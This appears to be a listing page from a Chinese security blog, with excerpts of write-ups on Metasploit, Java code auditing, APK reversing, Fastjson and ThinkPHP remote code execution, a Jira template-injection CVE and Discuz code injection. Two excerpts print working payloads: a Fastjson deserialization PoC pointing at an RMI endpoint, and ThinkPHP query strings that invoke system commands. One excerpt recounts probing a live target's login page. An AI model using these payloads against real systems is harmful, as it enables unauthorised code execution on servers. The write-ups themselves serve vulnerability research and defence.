浅谈MSF渗透测试

浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。 前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一...

密码保护:Java Web安全-代码审计

密码保护:Java Web安全-代码审计
@Author 安百科技 - 凌天实验室 - 园长 @Email [email protected] @Date 2018-12-29 @Github javaweb-codereview 一、JavaWeb安全基础 1. 何为代码审计? 通俗的说Java代码审计就是通过审计Java代码来发现Java应用程序自身中存在的安全问题,由于Java本身是编译型语言,所以即便只有class文件的情况下我们依然可以对Java代码进行审计。对于未编译的Java源代码文件我们可以直接阅读其源码,而对于已编译的cla...

打造Mac下APK逆向环境到实战接口XSS挖掘

打造Mac下APK逆向环境到实战接口XSS挖掘
前言 想尝试逆向APK来发现一些接口和安全问题,但是Mac下没啥好用的APK逆向工具,于是我就参考文章:https://blog.csdn.net/jyygn163/article/details/71731786 的思路在Mac下使用homebrew安装: brew install apktool brew install dex2jar JD-GUI去http://jd.benow.ca/下载,这里我是用的是jar版。 过程 自动化编译 手动敲命令太繁琐了,写个shell脚本一键化。 在.bash_profile文件(环境变量)加...

iOS URL Schemes与漏洞的碰撞组合

iOS URL Schemes与漏洞的碰撞组合
前言 iOS URL Schemes,这个单词对于大多数人来说可能有些陌生,但是类似下面这张图的提示大部分人应该都经常看见: 今天要探究的就是:了解iOS URL Schemes、如何发现iOS URL Schemes、iOS URL Schemes结合漏洞案例。 iOS URL Schemes 基本概念 抛开iOS从URL Schemes的字面意思理解,就是地址协议(Scheme一般用来表示协议,比如 http、https、ftp 等),我们所熟知的HTTP协议的URL格式就是: http(s):/...

浅谈Fastjson RCE漏洞的绕过史

浅谈Fastjson RCE漏洞的绕过史
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 引言 最近一段时间fastjson一度成为安全圈的热门话题,作为一个是使用十分广泛的jar包,每一次的RCE漏洞都足以博得大众的眼球,关于fastjson每次漏洞的分析也已经早有大牛详细剖析,本文章旨在顺着17年fastjson第一次爆出漏洞到现在为止,看一下fastjson的缝缝补补,瞻仰一下大佬们...

JIRA服务器模板注入漏洞 (CVE-2019-11581)

JIRA服务器模板注入漏洞 (CVE-2019-11581)
0x00 前言 https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html JIRA官方发布安全通告修复了一个服务器端的模板注入漏洞(CVE-2019-11581),影响Jira Server和Jira Data Center。成功利用该漏洞的攻击者可以在受影响服务器上远程执行代码 我司也有用相关产品,所以马上查看了一下是否影响 0x01 Jira简介 JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于...

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...

漏洞分析 | Discuz ML! V3.X 代码注入漏洞

漏洞分析 | Discuz ML! V3.X 代码注入漏洞
Discuz!ML V3.X 代码注入分析 代码来源:http://discuz.ml/download 作者:Web安全组-CoolCat 漏洞定位 在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件: 代码报错 根据报错跟踪到source/module/portal/portal_index.php第32行 portal_index.php 代码 查看问题函数上方查看定义函数以及关联文件的位置,可以看到template函数在/source/function/function_core.php中,继续跟进。 函数从 524行一...

thinkPHP渗透之经验决定成败

thinkPHP渗透之经验决定成败
如上图,目标就一个登陆框,最近 Thinkphp 程序很多,根据后台地址结构,猜测可能是 ThinkPHP ,随手输入 xxx 得到 thinkPHP 报错页面,确定目标程序和版本。 然后上 5.X EXP 测试: 命令执行漏洞已经被修复了。。。 爆破?这验证码我没辙。。。 尝试读取日志瞅瞅,结果遇到防火墙 然后查了下 IP ,没有CDN,果断查下旁站,有那么几个站,目测都是 thinkPHP 爱站旁站查询其实并不准确,有的查不到,所以...

thinkPHP 5X 在PHP7以上环境下的 GETSHELL

thinkPHP 5X 在PHP7以上环境下的 GETSHELL
起因 thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个, 但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~ GETSHELL 过程 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter=phpinfo&...